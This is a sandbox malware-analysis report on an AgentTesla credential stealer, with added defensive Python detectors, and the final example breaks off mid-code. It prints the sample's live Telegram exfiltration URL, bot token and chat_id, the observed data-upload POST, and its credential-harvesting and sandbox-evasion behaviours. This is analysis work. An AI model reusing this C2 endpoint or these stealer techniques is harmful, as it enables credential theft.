Windows Analysis Report
xnlP06YunJ.exe

Overview

General Information

Sample name: xnlP06YunJ.exe (renamed because the original name is a hash value)
Original sample name: 3301c867bfc564fad83be393a67e00cf4615b436940db9ed0728b3d4a523e040.exe
Analysis ID: 1632360
MD5: a76f2b7c0390e364909268037328a880
SHA1: 2177eb596046f6f3a0fd743cad0a438c990fdde4
SHA256: 3301c867bfc564fad83be393a67e00cf4615b436940db9ed0728b3d4a523e040
Tags: exe, user-adrian__luca

Detection

AgentTesla
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

(classification chart not included)

Process Tree

  • System is w10x64
  • xnlP06YunJ.exe (PID: 6616 cmdline: "C:\Users\user\Desktop\xnlP06YunJ.exe" MD5: A76F2B7C0390E364909268037328A880)
    • cmd.exe (PID: 6784 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 6948 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
    • xnlP06YunJ.exe (PID: 524 cmdline: "C:\Users\user\Desktop\xnlP06YunJ.exe" MD5: A76F2B7C0390E364909268037328A880)
    • cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 5776 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup
Malware family (Malpedia)

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage"}
AgentTesla: {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage?chat_id=7103094488"}
Yara Overview

PCAP (Network Traffic):
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Memory Dumps (5 of 10 entries shown):
Source | Rule | Description | Author
00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.1158237609.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000004.00000002.2109400212.00000000028BB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Unpacked PEs:
Source | Rule | Description | Author
0.2.xnlP06YunJ.exe.5db0000.6.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.xnlP06YunJ.exe.5db0000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

                  System Summary

Sigma rule matches: Invoke-Obfuscation CLIP+ Launcher and Invoke-Obfuscation VAR+ Launcher (both by Jonathan Cheong, oscd.community) fired on the same process-creation event:
Source: Process started. Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: (empty), Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\xnlP06YunJ.exe", ParentImage: C:\Users\user\Desktop\xnlP06YunJ.exe, ParentProcessId: 6616, ParentProcessName: xnlP06YunJ.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 6784, ProcessName: cmd.exe
The matched command line carries no visible obfuscation, so treat these two hits as low-fidelity; the durable signal in this event is a Desktop-resident executable driving ipconfig through cmd.exe, which the process tree also shows. Image and NewProcessName under SysWOW64 while the command line names System32 is file-system redirection for a 32-bit process, not tampering.
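The process tree and the Sigma event above are enough to write a far more specific detection than the two generic Invoke-Obfuscation launcher rules that fired. The following Python is an added example and not part of the Joe Sandbox report: it replays process-creation events modelled on this report's tree (PIDs, images and command lines are copied from the tree; the timestamps, the parent of the first process and the two trailing benign-control events are constructed for the example), resolves each ipconfig invocation past cmd.exe/conhost.exe to the process that really issued it, flags it when that originator lives in a user-writable path, and pairs a /release with a later /renew from the same originating image.

```python
import re

# Constructed process-creation events modelled on the process tree in this
# report. PIDs, images and command lines are copied from the tree; the
# timestamps, the parent of the first process and the final two "benign
# control" events are assumptions made for the example.
EVENTS = [
    {"ts": 0.0, "pid": 6616, "ppid": 4321,
     "image": r"C:\Users\user\Desktop\xnlP06YunJ.exe",
     "cmdline": r'"C:\Users\user\Desktop\xnlP06YunJ.exe"'},
    # 32-bit sample: the command line says System32 but the loaded image is
    # the SysWOW64 copy (file-system redirection), exactly as in the Sigma event.
    {"ts": 1.0, "pid": 6784, "ppid": 6616,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c ipconfig /release'},
    {"ts": 1.1, "pid": 6828, "ppid": 6784,
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ts": 1.2, "pid": 6948, "ppid": 6784,
     "image": r"C:\Windows\SysWOW64\ipconfig.exe",
     "cmdline": "ipconfig /release"},
    {"ts": 2.0, "pid": 524, "ppid": 6616,
     "image": r"C:\Users\user\Desktop\xnlP06YunJ.exe",
     "cmdline": r'"C:\Users\user\Desktop\xnlP06YunJ.exe"'},
    {"ts": 3.0, "pid": 5692, "ppid": 6616,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c ipconfig /renew'},
    {"ts": 3.2, "pid": 5776, "ppid": 5692,
     "image": r"C:\Windows\SysWOW64\ipconfig.exe",
     "cmdline": "ipconfig /renew"},
    # Benign control (constructed): an interactive shell whose parent is not
    # in the event stream running the same command.
    {"ts": 9.0, "pid": 7000, "ppid": 1,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"ts": 9.5, "pid": 7001, "ppid": 7000,
     "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /renew"},
]

USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(?:Desktop|Downloads|Documents|AppData)\\", re.I)
# Matches only the ipconfig.exe process itself, not the cmd.exe wrapper line.
IPCONFIG = re.compile(r'^(?:"?[^"]*\\)?ipconfig(?:\.exe)?"?\s+/(release|renew)\b', re.I)
WRAPPERS = {"cmd.exe", "conhost.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def originator(event, by_pid):
    """Walk parent links past cmd.exe/conhost.exe to the process that really
    issued the command. Returns None if the chain leaves the event stream."""
    cur, seen = by_pid.get(event["ppid"]), set()
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if basename(cur["image"]) not in WRAPPERS:
            return cur
        cur = by_pid.get(cur["ppid"])
    return None


def detect(events, window=60.0):
    """Return alert strings for ipconfig /release|/renew driven from a
    user-writable location, plus a combined alert for a release->renew pair."""
    by_pid = {e["pid"]: e for e in events}  # assumes no PID reuse in the window
    alerts, hits = [], []
    for e in events:
        m = IPCONFIG.match(e["cmdline"])
        if not m:
            continue
        verb = m.group(1).lower()
        origin = originator(e, by_pid)
        if origin is None or not USER_WRITABLE.search(origin["image"]):
            continue
        alerts.append(f"ipconfig /{verb} (pid {e['pid']}) driven by {origin['image']} "
                      f"(pid {origin['pid']}) from a user-writable path")
        hits.append((origin["image"].lower(), verb, e["ts"]))
    # Key the pair on the originating image, not its PID: a release from one
    # instance and a renew from a re-spawned copy of the same binary still pair.
    for img, verb, ts in hits:
        if verb == "release":
            for img2, verb2, ts2 in hits:
                if img2 == img and verb2 == "renew" and 0 <= ts2 - ts <= window:
                    alerts.append(f"network reset (release t={ts}, renew t={ts2}) from {img}")
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

The interesting design point is the ancestor walk: alerting on cmd.exe alone reproduces the Sigma noise, while resolving to the originator turns "cmd.exe ran ipconfig" into "an executable on the Desktop reset the network adapter", which is what the analyst actually wants to see. The pair check is keyed on the originating image rather than PID because this sample spawns a second copy of itself before the /renew.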
Suricata alerts (chronological)

Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2025-03-07T22:51:09.625936+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.7:49683 | 149.154.167.220:443 | TCP
2025-03-07T22:51:10.368588+0100 | 2851779 | 1 | Malware Command and Control Activity Detected | 192.168.2.7:49683 | 149.154.167.220:443 | TCP
2025-03-07T22:51:10.368588+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.7:49683 | 149.154.167.220:443 | TCP
2025-03-07T22:51:11.108511+0100 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220:443 | 192.168.2.7:49683 | TCP

                  AV Detection

Source: ipconfig.exe.5776.7.memstrmin, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage?chat_id=7103094488"}
Source: xnlP06YunJ.exe.524.4.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage"}
Source: xnlP06YunJ.exe, Virustotal: Detection: 72%
Source: xnlP06YunJ.exe, ReversingLabs: Detection: 60%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: xnlP06YunJ.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: xnlP06YunJ.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb (also seen with "SHA256" and checksum bytes appended, i.e. the RSDS path immediately followed by the PDB checksum debug-directory entry), source: xnlP06YunJ.exe, 00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp; xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp; xnlP06YunJ.exe, 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmp. This is the build path of the open-source TaskScheduler library that the sample bundles (see the Costura loader and Microsoft.Win32.TaskScheduler.dll findings), not the malware author's machine.
Source: Binary string: protobuf-net.pdb (also seen with "SHA256" and checksum bytes appended), source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\xnlP06YunJ.exe, Code function: 4x nop then jmp 06BCF618h, 0_2_06BCF560

                  Networking

Source: Network traffic, Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49683 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.7:49683 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49683 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49683
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected: POST /bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dd5d984054af83 | Host: api.telegram.org | Content-Length: 980 | Expect: 100-continue | Connection: Keep-Alive (no User-Agent header)
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 104.26.13.205
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
Strings found in binary or memory. The cacerts/crl/ocsp DigiCert URLs below are the AIA, CRL distribution point and OCSP fields of the certificate chain embedded in the sample's Authenticode signature (which the report flags as invalid), and the github/stackoverflow URLs come from the bundled open-source libraries (protobuf-net, System.Linq.Dynamic.Core, mono linker); neither set is attacker infrastructure. The Telegram and ipify entries are the ones that matter:
Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmp; 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp: http://api.telegram.org
Source: xnlP06YunJ.exe: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: xnlP06YunJ.exe: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: xnlP06YunJ.exe: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: xnlP06YunJ.exe: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: xnlP06YunJ.exe: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: xnlP06YunJ.exe: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: xnlP06YunJ.exe: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: xnlP06YunJ.exe: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: xnlP06YunJ.exe: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: xnlP06YunJ.exe: http://ocsp.digicert.com0, http://ocsp.digicert.com0A, http://ocsp.digicert.com0C, http://ocsp.digicert.com0X
Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp; 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: xnlP06YunJ.exe: http://www.digicert.com/CPS0
Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp: https://account.dyn.com/
Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp: https://api.ipify.org, https://api.ipify.org/, https://api.ipify.org/t
Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmp: https://api.telegram.org
Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp: https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/
Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmp: https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocument
Source: xnlP06YunJ.exe: https://github.com/StefH/System.Linq.Dynamic.Core/issues/358
Source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp: https://github.com/mgravell/protobuf-net (also seen with trailing "J" and "i" bytes, and in 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp)
Source: xnlP06YunJ.exe: https://github.com/mono/linker#link-xml-file-examples
Source: xnlP06YunJ.exe: https://github.com/mono/mono/issues/12917
Source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp: https://stackoverflow.com/q/11564914/23354;
Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp: https://stackoverflow.com/q/14436606/23354
Source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp: https://stackoverflow.com/q/2152978/23354
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown, Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49683 version: TLS 1.2
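Both the extracted configuration (Malware Configuration section) and the observed POST to /sendDocument carry the same Telegram bot token, which is the single most useful pivot in this report: the numeric bot id and secret identify the operator's bot, the chat_id identifies the receiving chat, and the method name tells you whether a text beacon (sendMessage) or a file upload (sendDocument) is in flight. The Python below is an added example, not code from the report or from the sample; its inputs are the two configuration blobs and the two HTTP request heads copied from this report (header lines re-split on CRLF; the request bodies are not in the report and are omitted). It extracts every Bot API reference from a text blob and, for a raw request, confirms the Host, pulls the token out of the path and notes the missing User-Agent that distinguishes the Telegram POST from the Firefox-impersonating ipify GET.

```python
import re

# Constructed inputs copied from this report: the two extracted configuration
# blobs, the POST to the Bot API and the api.ipify.org GET. Header lines are
# re-split on CRLF; the request bodies are not in the report and are omitted.
SAMPLE_CONFIG = (
    '{"C2 url": "https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage"}\n'
    '{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7351654760:'
    'AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage?chat_id=7103094488"}\n'
)
SAMPLE_POST = (
    "POST /bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocument HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------------8dd5d984054af83\r\n"
    "Host: api.telegram.org\r\nContent-Length: 980\r\nExpect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
SAMPLE_GET = (
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\n"
    "Host: api.ipify.org\r\nConnection: Keep-Alive\r\n\r\n"
)

# Bot API path: /bot<numeric bot id>:<secret>/<method>[?query]. The secret
# alphabet is [A-Za-z0-9_-]; its length is not pinned so older tokens match.
BOT_PATH = re.compile(
    r"/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})"
    r"(?:/(?P<method>[A-Za-z]+))?(?:\?(?P<query>[^\s\"'}]*))?")


def extract_bot_c2(text):
    """Pull every Bot API reference out of a text blob (strings output,
    extracted config, memory dump). Returns one dict per reference."""
    found = []
    for m in BOT_PATH.finditer(text):
        chat = re.search(r"(?:^|&)chat_id=(-?\d+)", m.group("query") or "")
        found.append({
            "bot_id": m.group("bot_id"),
            "token": f"{m.group('bot_id')}:{m.group('secret')}",
            "method": m.group("method"),
            "chat_id": chat.group(1) if chat else None,
        })
    return found


def parse_http_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def inspect_request(raw):
    """Flag a request that carries a bot token to api.telegram.org and note
    the missing User-Agent that this sample's POST exhibits."""
    method, path, headers = parse_http_request(raw)
    findings = []
    if headers.get("host", "").lower() != "api.telegram.org":
        return findings
    for c2 in extract_bot_c2(path):
        findings.append(f"{method} to Telegram Bot API method {c2['method']} "
                        f"with token of bot {c2['bot_id']}")
        if "user-agent" not in headers:
            findings.append("request has no User-Agent header")
    return findings


if __name__ == "__main__":
    for c2 in extract_bot_c2(SAMPLE_CONFIG):
        print(c2)
    print(inspect_request(SAMPLE_POST))
    print(inspect_request(SAMPLE_GET))
```

One caveat on deployment: the report's Yara hit on sslproxydump.pcap and the Suricata ETPRO rules both operate on decrypted traffic, because the sandbox intercepts TLS. On a production network without TLS inspection the path and headers are invisible; what remains observable is the DNS lookup and TLS SNI for api.telegram.org from a process that has no business talking to Telegram, which is a weaker but still usable signal.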
Source: C:\Users\user\Desktop\xnlP06YunJ.exe, Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\xnlP06YunJ.exe, Code function: 0_2_06C44BC8 NtResumeThread
Source: C:\Users\user\Desktop\xnlP06YunJ.exe, Code function: 0_2_06C44BC3 NtResumeThread
Source: C:\Users\user\Desktop\xnlP06YunJ.exe, Code functions (process 0, PID 6616): 0_2_01A7ACD0, 0_2_01A71AA1, 0_2_01A7ACC0, 0_2_01A7B660, 0_2_066BF7F0, 0_2_066BFAC0, 0_2_066BE2B8, 0_2_066A0040, 0_2_066A0022, 0_2_066BE800, 0_2_06BCD668, 0_2_06BC8B90, 0_2_06BC5EEF, 0_2_06BC8C54, 0_2_06BC8B8B, 0_2_06C40040
Source: C:\Users\user\Desktop\xnlP06YunJ.exe, Code functions (process 4, PID 524): 4_2_00D99108, 4_2_00D9F288, 4_2_00D99450, 4_2_00D955C0, 4_2_00D9A538, 4_2_00D968F8, 4_2_00D92C88, 4_2_00D9DDA8, 4_2_00D99D20, 4_2_00D9E158, 4_2_00D95278, 4_2_00D954E4, 4_2_00D9A529, 4_2_00D968E8, 4_2_00D929BD, 4_2_00D92A00, 4_2_00D9DD9F, 4_2_064CBE28, 4_2_064C26B1, 4_2_064C0712, 4_2_064C7D50, 4_2_064CCA40, 4_2_064CB328, 4_2_064CDBC0, 4_2_064C5840, 4_2_064CB958, 4_2_064C9118, 4_2_064CEE70, 4_2_064CAED8, 4_2_064C96E7, 4_2_064C9FE8, 4_2_064C6486, 4_2_064C6490, 4_2_064CD568, 4_2_064C6DA0, 4_2_064C322A, 4_2_064CCA30, 4_2_064CAAA0, 4_2_064CA3A8, 4_2_064CDBB0, 4_2_064C5830, 4_2_064C88D8, 4_2_064C8158, 4_2_064C8168, 4_2_064C9108, 4_2_06555200, 4_2_065556C0, 4_2_06554DF1
Source: xnlP06YunJ.exe, Static PE information: invalid certificate
Binary or memory strings whose version-info OriginalFilename differs from the submitted name xnlP06YunJ.exe, grouped by value:
  OriginalFilename Kqjoqlc.exe: xnlP06YunJ.exe (static file); xnlP06YunJ.exe, 00000000.00000000.857119340.0000000000F59000.00000002.00000001.01000000.00000003.sdmp
  OriginalFilename 77d62c29-4ea5-4d42-a3b6-c31fbd3b2ada.exe: xnlP06YunJ.exe, 00000000.00000002.1153257947.000000000452F000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000002.1141980710.000000000377B000.00000004.00000800.00020000.00000000.sdmp; 00000004.00000002.2105496167.0000000000902000.00000040.00000400.00020000.00000000.sdmp
  OriginalFilename Bcsvlqaj.dll: xnlP06YunJ.exe, 00000000.00000002.1153257947.000000000452F000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000002.1156603078.0000000005980000.00000004.08000000.00040000.00000000.sdmp; 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmp
  OriginalFilename Microsoft.Win32.TaskScheduler.dll: xnlP06YunJ.exe, 00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp; 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmp
  OriginalFilename protobuf-net.dll: xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp
  OriginalFilename clr.dll: xnlP06YunJ.exe, 00000000.00000002.1139963777.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
  OriginalFilename UNKNOWN_FILE: xnlP06YunJ.exe, 00000004.00000002.2105430058.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
  OriginalFilename (empty): xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp
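The memory-dump identifiers used throughout this report (in the Yara Overview and in the OriginalFilename findings above) encode enough to tell the on-disk loader from the injected payload without opening a single dump. The following Python is an added example and not Joe Sandbox's code or documentation: the field layout it assumes (process index, phase, dump id, base address, page protection, an undecoded field, memory type, another undecoded field) is inferred from the names on this page and is an assumption; the protection and type values are decoded against the winnt.h constants PAGE_* and MEM_PRIVATE/MEM_MAPPED/MEM_IMAGE, and the dump names and strings fed to it are copied from the findings above. Run over those findings it singles out the one region that is private, writable and executable: process 4 at 0x902000, which carries the 77d62c29-... version info, versus process 0's read-only image region that still reads Kqjoqlc.exe, the loader's own name.

```python
import re

# winnt.h memory protection and MEMORY_BASIC_INFORMATION.Type constants.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout of the dump names as they appear in this report:
# <process index>.<phase>.<dump id>.<base address>.<protect>.<f6>.<type>.<f8>.sdmp
# Fields f6 and f8 are carried through undecoded.
SDMP = re.compile(
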